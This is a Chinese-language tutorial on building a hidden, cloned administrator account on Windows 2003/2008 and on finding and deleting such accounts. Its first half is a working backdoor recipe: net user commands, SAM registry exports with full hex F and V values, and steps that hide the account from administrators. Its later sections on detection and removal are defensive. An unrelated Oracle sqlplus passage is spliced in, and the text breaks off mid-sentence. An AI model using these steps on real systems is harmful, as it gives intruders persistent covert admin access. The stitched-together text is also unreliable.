win20032008下建立隐藏系统用户与查看及删除方法

1、win20032008 下建立隐藏系统用户与查看及删除方法windows 系统很好用使用的人很多很多，但也超容易中毒，下面我来给大家讲 win2003/2008 下建立隐藏系统用户与查看及删除方法，希望对大家所有帮助。建立隐藏系统用先做准备工作，新建一个用户，名为 sxitn$(加上$符号，使用命令 net user 将查看不到用户 ) ，密码为 123： net user sxitn$ 123456 /add然后把 sxitn$ 加入管理组：net localgroup administrators sxitn$ /add然后，开始一>>运行，输入regedt32.exe,找到H

2、KEY_LOCAL_MACHINE 下的 SAM 项下的 SAM ，点击右 键权限，在安全选项卡中添加用户组 Administrators 或者 当前用户，允许完全控制，应用确定后关闭。开始 > 运行，输入 regedit 打注册表。找到HKEY_LOCAL_MACHINE SAMSAM Domai ns AliasesUsersNamessxitn$ ，记住右边的值的类型>0 X 3ef，然后导出，命名为 sxitn$.reg ;在Users项中找 到 3ef 项，也同样导出，命名为 3ef.reg； 1f4(administrator 默认的项）项也导出，命名为 1f4.reg

3、 。用记事本打开 1f4.reg ，复制：F=hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00, 00,00,00,00,00,/00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb ,08,df,c7,01,/ f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01 ,00,00,00,00,/00,00,00,00,00,00,00用记事本打开3ef.reg，把刚才复制的粘贴到相应的位

4、置。用记事本打开 sxitn$.reg ，复制：HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Us ers/Names/sxitn$ =hex(3ef):粘贴到 3ef.reg 最后的位置。最后 3ef.reg 为：Windows Registry Editor Version 5.00HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Us ers/000003EFF=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,00,00,00,00,00,/0

5、0,90,97,6d,19,10,df,c7,01,00,00,00,00,00,00,00,00,00,00,00,00 ,00,00,00,00,/ ef,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01 ,00,00,00,00,/00,95,7c,4e,2e,20,74V=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,0c,00 ,00,00,00,00,00,/00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,0

6、0,00,00,00,00 ,00,00,00,00,/ c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00 ,00,00,00,c8,/00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00 ,00,00,c8,00,/00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00 ,00,c8,00,00,/00,00,00,00,00,00,00,00,00,c8,00,00,00,0

7、0,00,00,00,00,00,00,00 ,c8,00,00,00,/08,00,00,00,01,00,00,00,d0,00,00,00,14,00,00,00,00,00,00,00,e4 ,00,00,00,14,/00,00,00,00,00,00,00,f8,00,00,00,04,00,00,00,00,00,00,00,fc,00, 00,00,04,00,/00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00 ,00,44,00,00,/00,02,00,30,00,02,00,00,00,02,c0

8、,14,00,44,00,05,01,01,01,00,00 ,00,00,00,01,/00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07, 00,00,00,02,/00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,0 0,00,05,15,00,/00,00,5b,84,10,ab,37,d9,e9,d7,09,61,8b,28,ef,03,00,00,00,00,18, 00,ff,07,0f,/00,01,02,00,00,00,00,00,

9、05,20,00,00,00,20,02,00,00,00,00,14,0 0,5b,03,02,00,/01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,2 0,00,00,00,20,/02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,73,0 0,78,00,69,00,/74,00,6e,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,c5,3d,41 ,62,8b,c0,6f,/1e,57,d2,4c,dc,4

10、e,20,76,a3,01,00,01,00,47,ad,d7,59,3f,ac,4a,a1,f6,dd,c6,d9,/ bc,1e,8d,15,01,00,01,00,01,00,01,00 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Us ers/Names/sxitn$=hex(3ef):然后保存。删除用户 sxitn$ ：net user sxitn$ /delete之后运行 3ef.reg 导入注册表！打开 regedt32.exe 把 SAM 安全选项卡中的 administrator 删除，然后应用。这样，隐藏用户就建立好了。怎样查看账号

11、创建时间1、在你安装的时候有一个设置密码，那个密码是你的数据库管理员的密码，一定要记住。2、等数据库安装好之后， 启动 oracle 数据库服务后， 用下面 的命令就可以进入 sqlplus,在cmd中输入 sqlplus sys/密码as sysdba3、进入数据库后用下面的命令建用户： create user user_name idnentified by password;grant resource,connect to user_name;4、现在 sqlplus 就可以进入了，在 cmd 中输入 sqlplus user_name/password查看 WIN2003服务器下是否

12、加入了隐藏账户 修改注册表型隐藏账户由于使用这种方法隐藏的账户是不会在 “命令提示符” 和“计中看到的，因此可以到注册表中删除隐藏账户。来到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUse rsNames”把这 里存在的账户和“计算机管理”中存在的 账户进行比较，多出来的账户就是隐藏账户了。想要删除它 也很简单，直接删除以隐藏账户命名的项即可。使用 regedit 打开注册表编辑器找到 HKEY_LOCAL_MACHINE SAM SAM DomainsAccountUsers，这里下面的数字和字母组合的子键是你计算机中所有用户帐户的 SAM 项。子分支 Na

13、mes 下是用户名，每个对应上面的 SAM 项。查找隐藏的帐户就比较两个用户名的 SAM 值完全一样的就说明其中个是克隆帐户。你可以在这里删除其用户名。般推荐分别导出用户名项和对应的 SAM ，然后找一个关键 字分析比较。具体比较的方法多种多样自己看了。目前有种系统级后门，可以在有管理员帐户登入的时候自动 删除这里的克隆帐户值，等你退出了又自动恢复。遇到这种 的情况，这里是查不出来的。一般这种后门都是高手搞的， 免杀。遇到这种情况，建议找专业安全人员处理。另外：本地安全策略本地策略安全选项中可以查看默认管理员和贵宾帐户，这里可以查出默认的 guest 是否被 克隆了，如果这个帐户被克隆这里会显

14、示出真正的克隆后的 用户名。计算机管理中显示的依然是正常的用户，所以查那里是没什 么意义的。另一种解决办法开始 - 运行cmd 下 运行net localgroup administrators看看那加了 $的就是隐藏的账户了 1、右键单击“我的电脑”算机管理”7“本地用户和组”7“用户”7看看有没有陌生用户2、“开始”-“运行”-“ cmd ”“ net user”T看看有没有陌生用户隐藏账户在上述中看不到的3、“开始”-“运行”-“ cmd ”“ regedit”T找到注册表分支HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/”T看看有没有克隆用户无法看到名称的隐藏账户 如果黑客制作了一个修改注册表型隐藏账户，在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的，甚至无法知道黑客建立的隐藏账户名称。 不过世事没有绝对， 我们可以借助 “组策略” 的帮助， 让黑客无法通过隐藏账户登陆。点击“开始”T“运行”输入“gpedit.msc”运行“组策略”,依次展开“计算机